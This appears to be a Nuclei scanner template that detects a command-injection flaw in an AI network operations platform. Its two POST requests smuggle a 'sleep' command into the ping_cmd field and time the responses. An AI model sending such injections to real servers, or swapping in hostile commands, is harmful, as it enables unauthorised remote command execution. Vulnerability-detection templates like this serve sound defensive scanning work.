1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40
| id: quan_xi_ai_wang_luo_yun_wei_ping_tai_ajax_cloud_router_config-rce
info: name: 全息AI网络运维平台ajax_cloud_router_config-rce author: admin severity: high tags: 全息AI,网络运维平台,ajax_cloud_router_config,rce
http: - raw: - | POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1 Host: {{Hostname}} Content-Length: 24 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Connection: close
ping_cmd=8.8.8.8|sleep%2b4
- | POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1 Host: {{Hostname}} Content-Length: 24 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Connection: close
ping_cmd=8.8.8.8|sleep%2b6
matchers-condition: and matchers: - type: dsl dsl: - 'duration_1>=4 && duration_1<=6' - 'duration_2>=6 && duration_2<=8'
|